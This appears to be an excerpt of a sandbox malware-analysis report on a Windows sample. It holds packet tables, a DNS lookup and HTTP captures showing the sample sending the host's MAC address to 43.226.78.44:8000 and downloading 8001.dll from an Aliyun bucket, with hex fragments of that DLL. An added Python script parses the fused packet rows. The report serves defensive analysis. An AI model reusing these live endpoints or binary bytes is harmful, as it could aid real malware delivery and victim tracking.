                                                              Jan 2, 2025 09:28:30.997880936 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.998941898 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.998992920 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.220936060 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221035004 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221075058 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221117020 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221132994 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221134901 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221162081 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221168995 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221179962 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221194983 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221226931 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221232891 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221278906 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221447945 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221492052 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221498013 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221546888 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221551895 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221596956 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221745968 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221807957 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.222004890 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.222062111 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.222064972 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.222079039 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.222106934 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.222138882 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.222145081 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.222206116 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.222836018 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.222898006 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.222903967 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.222914934 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.222973108 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.222992897 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.223303080 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.223347902 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.223351955 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.223367929 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.223391056 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.223427057 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.223467112 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.223516941 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.223524094 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.223556042 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.223625898 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.223625898 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.223634958 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.223674059 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.224343061 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.224397898 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.224406958 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.224419117 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.224461079 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.225709915 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.225764990 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.225824118 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.225878000 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.225892067 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.225940943 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.307699919 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.307771921 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.307804108 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.307864904 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.651912928 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.651964903 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.652007103 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.652086020 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.652116060 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.652148008 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.652172089 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.652192116 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.652234077 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.652240992 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.652266979 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.652282953 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.652313948 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.656461000 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.656488895 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:45.546401978 CET6307253192.168.2.41.1.1.1
                                                              Jan 2, 2025 09:28:45.551286936 CET53630721.1.1.1192.168.2.4
                                                              Jan 2, 2025 09:28:45.551392078 CET6307253192.168.2.41.1.1.1
                                                              Jan 2, 2025 09:28:45.556233883 CET53630721.1.1.1192.168.2.4
                                                              Jan 2, 2025 09:28:46.015247107 CET6307253192.168.2.41.1.1.1
                                                              Jan 2, 2025 09:28:46.020267010 CET53630721.1.1.1192.168.2.4
                                                              Jan 2, 2025 09:28:46.021363974 CET6307253192.168.2.41.1.1.1
                                                              Jan 2, 2025 09:30:16.096401930 CET497308000192.168.2.443.226.78.44
                                                              Jan 2, 2025 09:30:16.101685047 CET80004973043.226.78.44192.168.2.4
                                                              Jan 2, 2025 09:30:16.101767063 CET497308000192.168.2.443.226.78.44
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 2, 2025 09:28:28.241522074 CET | 56670 | 53 | 192.168.2.4 | 1.1.1.1
Jan 2, 2025 09:28:28.810309887 CET | 53 | 56670 | 1.1.1.1 | 192.168.2.4
Jan 2, 2025 09:28:45.540153027 CET | 53 | 61830 | 1.1.1.1 | 192.168.2.4
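The packet tables above, as this extraction presents them, run timestamp, source port, destination port, source IP and destination IP together with no separator, so a row like "49731443192.168.2.439.103.20.61" has more than one syntactically valid reading. The script below is an added example (not part of the Joe Sandbox report) that splits such rows using two facts the analyst already has, the analysis VM's address and the ports that act as services in this trace, then tallies packets per remote endpoint and lists ports outside 53/80/443, which is the observation behind the report's "non-standard ports" signature. The sample rows are copied from this report; SERVICE_PORTS is an assumption to adjust per report.

```python
"""Parse and summarise Joe Sandbox packet rows whose columns were run together.

Added example, not part of the sandbox report. A fused tail such as
"49731443192.168.2.439.103.20.61" is split by enumerating every valid
(sport, dport, src, dst) reading and keeping the ones where the sandbox host
talks to a service port; leftover ambiguity is settled by the (remote IP,
sandbox port) pairs that unambiguous rows already establish.
"""
import re

SANDBOX_IP = "192.168.2.4"           # analysis VM address shown in the report
SERVICE_PORTS = {53, 80, 443, 8000}  # assumption: ports treated as services here

# Constructed sample: rows copied from the report's TCP packet table.
SAMPLE_ROWS = [
    "Jan 2, 2025 09:28:30.550132036 CET49731443192.168.2.439.103.20.61",
    "Jan 2, 2025 09:28:30.550359011 CET4434973139.103.20.61192.168.2.4",
    "Jan 2, 2025 09:28:45.546401978 CET6307253192.168.2.41.1.1.1",
    "Jan 2, 2025 09:28:45.551286936 CET53630721.1.1.1192.168.2.4",
    "Jan 2, 2025 09:30:16.096401930 CET497308000192.168.2.443.226.78.44",
    "Jan 2, 2025 09:30:16.101685047 CET80004973043.226.78.44192.168.2.4",
    "Jan 2, 2025 09:30:16.101767063 CET497308000192.168.2.443.226.78.44",
]

_OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"   # no leading zeros
IP_RE = re.compile(rf"{_OCTET}(?:\.{_OCTET}){{3}}")
ROW_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+ [A-Z]{3,4})(?P<tail>\d.*)$")


def _splits(tail):
    """All (sport, dport, src, dst) readings of a fused tail that are
    syntactically valid and have the sandbox host on a service port's peer."""
    found = set()
    for a in range(1, 6):                       # source port: 1-5 digits
        for b in range(1, 6):                   # destination port: 1-5 digits
            p1, p2, rest = tail[:a], tail[a:a + b], tail[a + b:]
            if not (p1.isdigit() and p2.isdigit()) or "0" in (p1[0], p2[0]):
                continue
            sport, dport = int(p1), int(p2)
            if max(sport, dport) > 65535:
                continue
            for j in range(7, len(rest) - 6):   # each IP needs >= 7 chars
                src, dst = rest[:j], rest[j:]
                if not (IP_RE.fullmatch(src) and IP_RE.fullmatch(dst)):
                    continue
                if (src == SANDBOX_IP and dport in SERVICE_PORTS) or \
                        (dst == SANDBOX_IP and sport in SERVICE_PORTS):
                    found.add((sport, dport, src, dst))
    return found


def _endpoint(split):
    """(remote IP, sandbox-side port) of one reading."""
    sport, dport, src, dst = split
    return (dst, sport) if src == SANDBOX_IP else (src, dport)


def parse_rows(rows):
    """Two passes: rows with a single reading first, then the rest are settled
    by the (remote IP, sandbox port) pairs the first pass established."""
    parsed = [None] * len(rows)
    pending = []
    for i, row in enumerate(rows):
        m = ROW_RE.match(row.strip())
        if not m:
            raise ValueError("unrecognised row: %r" % row)
        readings = _splits(m["tail"])
        if len(readings) == 1:
            parsed[i] = (m["ts"],) + readings.pop()
        else:
            pending.append((i, m["ts"], readings))
    known = {_endpoint(p[1:]) for p in parsed if p}
    for i, ts, readings in pending:
        hits = [r for r in readings if _endpoint(r) in known]
        if len(hits) != 1:
            raise ValueError("cannot settle row at %s: %s" % (ts, sorted(readings)))
        parsed[i] = (ts,) + hits[0]
    return parsed


def summarize(parsed):
    """Packet counts per remote (IP, port), split by direction from the sandbox."""
    summary = {}
    for _, sport, dport, src, dst in parsed:
        outbound = src == SANDBOX_IP
        key = (dst, dport) if outbound else (src, sport)
        entry = summary.setdefault(key, {"out": 0, "in": 0})
        entry["out" if outbound else "in"] += 1
    return summary


def odd_ports(summary, expected=frozenset({53, 80, 443})):
    """Remote endpoints on ports outside the expected set."""
    return sorted(ep for ep in summary if ep[1] not in expected)


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    for row in rows:
        print(row)
    flows = summarize(rows)
    print(flows)
    print("non-standard ports:", odd_ports(flows))
```

On the sample rows the second and fourth rows each have two readings ("443/4973 from 139.103.20.61" versus "443/49731 from 39.103.20.61", and "53/6307 from 21.1.1.1" versus "53/63072 from 1.1.1.1"); both are settled by the outbound rows that precede them, and the only endpoint off the expected ports is 43.226.78.44:8000.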
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 2, 2025 09:28:28.241522074 CET | 192.168.2.4 | 1.1.1.1 | 0x52a1 | Standard query (0) | cesg1.oss-cn-beijing.aliyuncs.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 2, 2025 09:28:28.810309887 CET | 1.1.1.1 | 192.168.2.4 | 0x52a1 | No error (0) | cesg1.oss-cn-beijing.aliyuncs.com | sc-2dwy.cn-beijing.oss-adns.aliyuncs.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 2, 2025 09:28:28.810309887 CET | 1.1.1.1 | 192.168.2.4 | 0x52a1 | No error (0) | sc-2dwy.cn-beijing.oss-adns.aliyuncs.com | sc-2dwy.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 2, 2025 09:28:28.810309887 CET | 1.1.1.1 | 192.168.2.4 | 0x52a1 | No error (0) | sc-2dwy.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com | | 39.103.20.61 | A (IP address) | IN (0x0001) | false
                                                              • https:
                                                                • cesg1.oss-cn-beijing.aliyuncs.com
                                                              • 43.226.78.44:8000
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 43.226.78.44 | 8000 | 7472 | C:\Users\user\Desktop\1734098836319.exe
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 09:28:26.128614902 CET | 352 | OUT | POST /macweb/submit/ HTTP/1.1
                                                              Accept: */*
                                                              Referer: http://43.226.78.44:8000/macweb/submit/
                                                              Accept-Language: zh-cn
                                                              Content-Type: application/x-www-form-urlencoded
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
                                                              Host: 43.226.78.44:8000
                                                              Content-Length: 49
                                                              Cache-Control: no-cache
                                                              Data Raw: 63 68 61 6e 6e 65 6c 5f 6e 75 6d 62 65 72 3d 38 30 30 33 26 6d 61 63 5f 61 64 64 72 65 73 73 3d 45 43 3a 46 34 3a 42 42 3a 45 41 3a 31 35 3a 38 38
                                                              Data Ascii: channel_number=8003&mac_address=EC:F4:BB:EA:15:88
Jan 2, 2025 09:28:27.968727112 CET | 17 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 39.103.20.61 | 443 | 7472 | C:\Users\user\Desktop\1734098836319.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 08:28:30 UTC | 254 | OUT | GET /8001.dll HTTP/1.1
                                                              Accept: */*
                                                              Referer: https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dll
                                                              Accept-Language: zh-cn
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
                                                              Host: cesg1.oss-cn-beijing.aliyuncs.com
                                                              Cache-Control: no-cache
2025-01-02 08:28:30 UTC | 559 | IN | HTTP/1.1 200 OK
                                                              Server: AliyunOSS
                                                              Date: Thu, 02 Jan 2025 08:28:30 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 229376
                                                              Connection: close
                                                              x-oss-request-id: 67764E2E998B3E33315B15D7
                                                              Accept-Ranges: bytes
                                                              ETag: "0269CBD8F0D55E1B87BE84F31EE9F4C0"
                                                              Last-Modified: Thu, 26 Dec 2024 17:41:23 GMT
                                                              x-oss-object-type: Normal
                                                              x-oss-hash-crc64ecma: 271439009371289363
                                                              x-oss-storage-class: Standard
                                                              x-oss-ec: 0048-00000113
                                                              Content-Disposition: attachment
                                                              x-oss-force-download: true
                                                              Content-MD5: AmnL2PDVXhuHvoTzHun0wA==
                                                              x-oss-server-time: 1
2025-01-02 08:28:30 UTC | 3537 | IN | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5d ac 9e 7d 19 cd f0 2e 19 cd f0 2e 19 cd f0 2e 62 d1 fc 2e 18 cd f0 2e da c2 af 2e 1d cd f0 2e 9a d1 fe 2e 02 cd f0 2e 2f eb fa 2e 7b cd f0 2e da c2 ad 2e 16 cd f0 2e 19 cd f1 2e 80 cd f0 2e 2f eb fb 2e 5b cd f0 2e 19 cd f0 2e 11 cd f0 2e f1 d2 fb 2e 1a cd f0 2e f1 d2 f4 2e 18 cd f0 2e 52 69 63 68 19 cd f0 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05
                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$]}...b....../.{...../.[.......Rich.PEL
2025-01-02 08:28:30 UTC | 4096 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              Data Ascii:
2025-01-02 08:28:30 UTC | 4096 | IN | Data Raw: 01 00 83 c4 0c 89 45 c8 83 7d c8 00 0f 85 6c 00 00 00 89 65 d0 ff 75 f4 ff 15 00 c0 02 10 90 90 90 90 39 65 d0 74 17 68 92 03 00 00 68 88 66 01 04 68 06 00 00 00 e8 82 87 01 00 83 c4 0c 89 65 d0 68 00 00 00 00 ff 75 fc ff 15 08 c0 02 10 90 90 90 90 39 65 d0 74 17 68 ac 03 00 00 68 88 66 01 04 68 06 00 00 00 e8 51 87 01 00 83 c4 0c b8 a6 e2 02 10 e9 c9 03 00 00 e9 93 03 00 00 68 04 00 00 80 6a 00 68 c4 e2 02 10 68 01 00 00 00 bb 98 01 00 00 e8 36 a7 01 00 83 c4 10 89 45 d0 8b 45 d0 50 8b 5d e0 85 db 74 09 53 e8 01 87 01 00 83 c4 04 58 89 45 e0 db 45 10 dd 5d cc dd 45 cc dc 0d af e2 02 10 dd 5d c4 dd 45 c4 e8 a2 f8 ff ff 68 01 03 00 80 6a 00 50 68 01 00 00 00 bb bc 01 00 00 e8 07 aa 01 00 83 c4 10 89 45 c0 8b 45 c0 50 8b 5d dc 85 db 74 09 53 e8 b2 86 01 00
                                                              Data Ascii: E}leu9ethhfhehu9ethhfhQhjhh6EEP]tSXEE]E]EhjPhEEP]tS
2025-01-02 08:28:30 UTC | 4096 | IN | Data Raw: 68 04 00 00 80 6a 00 68 8f e4 02 10 68 04 00 00 80 6a 00 68 76 e4 02 10 68 30 00 01 00 6a 00 ff 75 f8 68 04 00 00 00 bb 4c 09 00 00 e8 1e 90 01 00 83 c4 34 68 02 00 00 80 6a 00 68 00 00 00 00 6a 00 6a 00 6a 00 68 04 00 00 80 6a 00 68 96 e4 02 10 68 04 00 00 80 6a 00 8b 45 f4 85 c0 75 05 b8 a6 e2 02 10 50 68 04 00 00 00 bb 48 01 00 00 e8 da 9a 01 00 83 c4 34 89 45 d8 83 7d d8 ff 0f 85 8d 00 00 00 8d 45 f4 50 e8 6f 24 00 00 89 45 dc 8d 45 f4 50 e8 7b 25 00 00 89 45 d8 68 04 00 00 80 6a 00 8b 45 d8 85 c0 75 05 b8 a6 e2 02 10 50 68 04 00 00 80 6a 00 8b 45 dc 85 c0 75 05 b8 a6 e2 02 10 50 68 04 00 00 80 6a 00 68 76 e4 02 10 68 30 00 01 00 6a 00 ff 75 f8 68 04 00 00 00 bb 4c 09 00 00 e8 65 8f 01 00 83 c4 34 8b 5d dc 85 db 74 09 53 e8 b7 76 01 00 83 c4 04 8b 5d
                                                              Data Ascii: hjhhjhvh0juhL4hjhjjjhjhhjEuPhH4E}EPo$EEP{%EhjEuPhjEuPhjhvh0juhLe4]tSv]
2025-01-02 08:28:30 UTC | 4096 | IN | Data Raw: 00 e8 b7 67 01 00 83 c4 0c c1 e0 02 03 d8 89 5d d4 db 45 f4 dd 5d cc dd 45 cc dc 25 b7 e2 02 10 dd 5d c4 dd 45 c4 e8 48 d9 ff ff 68 01 03 00 80 6a 00 50 68 01 03 00 80 6a 00 68 01 00 00 00 68 04 00 00 80 6a 00 8b 5d d4 8b 03 85 c0 75 05 b8 a6 e2 02 10 50 68 03 00 00 00 bb 3c 01 00 00 e8 1b 89 01 00 83 c4 28 89 45 c0 8b 45 c0 50 8b 5d f0 85 db 74 09 53 e8 36 67 01 00 83 c4 04 58 89 45 f0 68 02 00 00 80 6a 00 68 00 00 00 00 6a 00 6a 00 6a 00 68 04 00 00 80 6a 00 68 08 e5 02 10 68 04 00 00 80 6a 00 8b 45 f0 85 c0 75 05 b8 a6 e2 02 10 50 68 04 00 00 00 bb 48 01 00 00 e8 8c 8a 01 00 83 c4 34 89 45 d0 83 7d d0 ff 0f 84 48 02 00 00 b8 a6 e2 02 10 50 8b 5d ec 85 db 74 09 53 e8 cb 66 01 00 83 c4 04 58 89 45 ec 6a 00 6a 00 6a 00 68 04 00 00 80 6a 00 68 08 e5 02 10
                                                              Data Ascii: g]E]E%]EHhjPhjhhj]uPh<(EEP]tS6gXEhjhjjjhjhhjEuPhH4E}HP]tSfXEjjjhjh
2025-01-02 08:28:30 UTC | 4096 | IN | Data Raw: c6 ff ff b8 01 00 00 00 3b c1 7c 17 68 58 05 00 00 68 68 66 01 04 68 01 00 00 00 e8 9d 57 01 00 83 c4 0c 03 d8 89 5d c8 68 01 03 00 80 6a 00 68 0f 00 00 00 8b 5d c8 8a 03 25 ff 00 00 00 68 01 03 00 80 6a 00 50 68 02 00 00 00 bb c4 00 00 00 e8 da 7a 01 00 83 c4 1c 89 45 c4 68 01 03 00 80 6a 00 68 02 00 00 00 68 01 03 00 80 6a 00 ff 75 c4 68 02 00 00 00 bb f8 09 00 00 e8 0f 8b 01 00 83 c4 1c 89 45 c0 8b 5d e0 e8 7c c5 ff ff b8 02 00 00 00 3b c1 7c 17 68 8b 05 00 00 68 68 66 01 04 68 01 00 00 00 e8 12 57 01 00 83 c4 0c 03 d8 89 5d bc 68 01 03 00 80 6a 00 68 06 00 00 00 8b 5d bc 8a 03 25 ff 00 00 00 68 01 03 00 80 6a 00 50 68 02 00 00 00 bb fc 09 00 00 e8 3f 7a 01 00 83 c4 1c 89 45 b8 db 45 c0 dd 5d b0 dd 45 b0 db 45 b8 dd 5d a8 dc 45 a8 dc 05 b7 e2 02 10 dd
                                                              Data Ascii: ;|hXhhfhW]hjh]%hjPhzEhjhhjuhE]|;|hhhfhW]hjh]%hjPh?zEE]EE]E
2025-01-02 08:28:30 UTC | 4096 | IN | Data Raw: 04 68 04 00 00 00 e8 b2 47 01 00 83 c4 0c 59 5b 3b c1 7c 17 68 f5 02 00 00 68 88 68 01 04 68 01 00 00 00 e8 95 47 01 00 83 c4 0c c1 e0 02 03 d8 89 5d f0 ff 75 f0 e8 27 04 00 00 89 45 ec 8d 45 ec 50 8d 45 f8 50 e8 67 05 00 00 89 45 e8 8b 5d ec 85 db 74 09 53 e8 56 47 01 00 83 c4 04 83 7d e8 00 0f 85 d7 00 00 00 8b 5d fc e8 9a b5 ff ff 53 51 8b 45 f4 48 79 17 68 1c 03 00 00 68 88 68 01 04 68 04 00 00 00 e8 31 47 01 00 83 c4 0c 59 5b 3b c1 7c 17 68 1c 03 00 00 68 88 68 01 04 68 01 00 00 00 e8 14 47 01 00 83 c4 0c c1 e0 02 03 d8 89 5d f0 8d 45 f8 50 6a 04 b8 02 00 00 00 e8 8b 4b 01 00 83 c4 08 8b 5d f0 8b 03 89 45 ec 8b 5d f8 89 5d e8 e8 30 b5 ff ff 89 4d e4 8b 7d e8 c7 07 01 00 00 00 83 c7 04 8b c1 40 89 07 83 c7 04 3b fb 74 04 8b f3 f3 a5 8b 45 e4 40 c1 e0
                                                              Data Ascii: hGY[;|hhhhG]u'EEPEPgE]tSVG}]SQEHyhhhh1GY[;|hhhhG]EPjK]E]]0M}@;tE@
2025-01-02 08:28:30 UTC | 4096 | IN | Data Raw: 04 00 55 8b ec 81 ec 28 00 00 00 c7 45 fc 00 00 00 00 c7 45 f8 00 00 00 00 c7 45 f4 00 00 00 00 c7 45 f0 00 00 00 00 68 86 e5 02 10 8b 5d 08 ff 33 b9 02 00 00 00 e8 ef a5 ff ff 83 c4 08 89 45 ec 8b 45 ec 50 8b 5d fc 85 db 74 09 53 e8 5f 37 01 00 83 c4 04 58 89 45 fc 8d 45 fc 50 e8 84 01 00 00 89 45 f8 83 7d f8 00 0f 84 43 00 00 00 89 65 e8 ff 75 f8 ff 15 eb 03 03 10 90 90 90 90 83 c4 04 39 65 e8 74 17 68 cc 00 00 00 68 61 66 01 04 68 06 00 00 00 e8 22 37 01 00 83 c4 0c 89 45 e0 83 7d e0 00 0f 8e 07 00 00 00 b8 01 00 00 00 eb 05 b8 00 00 00 00 85 c0 0f 84 e0 00 00 00 89 65 ec 68 00 00 00 00 68 00 00 00 00 68 ff ff ff ff ff 75 f8 68 00 00 00 00 ff 75 0c ff 15 9c c0 02 10 90 90 90 90 39 65 ec 74 17 68 0b 01 00 00 68 61 66 01 04 68 06 00 00 00 e8 be 36 01 00
                                                              Data Ascii: U(EEEEh]3EEP]tS_7XEEPE}Ceu9ethhafh"7E}ehhhuhu9ethhafh6
2025-01-02 08:28:30 UTC | 4096 | IN | Data Raw: bb 34 01 00 00 e8 c5 5a 01 00 83 c4 1c 89 45 a4 8b 45 a4 50 8b 5d e8 85 db 74 09 53 e8 90 27 01 00 83 c4 04 58 89 45 e8 c7 45 b4 00 00 00 00 6a 00 ff 75 b4 c7 45 b0 00 00 00 00 6a 00 ff 75 b0 b8 df e5 02 10 89 45 ac 8d 45 ac 50 8d 45 f0 50 e8 1c 64 00 00 89 45 a8 8b 5d ac 85 db 74 09 53 e8 4c 27 01 00 83 c4 04 8b 45 a8 50 8b 5d f0 85 db 74 09 53 e8 38 27 01 00 83 c4 04 58 89 45 f0 68 a6 e2 02 10 ff 75 f0 e8 fd a3 ff ff 83 c4 08 83 f8 00 0f 84 16 0f 00 00 c7 45 b4 00 00 00 00 6a 00 ff 75 b4 c7 45 b0 00 00 00 00 6a 00 ff 75 b0 b8 6d e5 02 10 89 45 ac 8d 45 ac 50 b8 ea e5 02 10 89 45 a8 8d 45 a8 50 8d 45 f0 50 e8 c6 47 00 00 89 45 a4 8b 5d a8 85 db 74 09 53 e8 cf 26 01 00 83 c4 04 8b 5d ac 85 db 74 09 53 e8 bf 26 01 00 83 c4 04 8b 45 a4 50 8b 5d f0 85 db 74
                                                              Data Ascii: 4ZEEP]tS'XEEjuEjuEEPEPdE]tSL'EP]tS8'XEhuEjuEjumEEPEEPEPGE]tS&]tS&EP]t
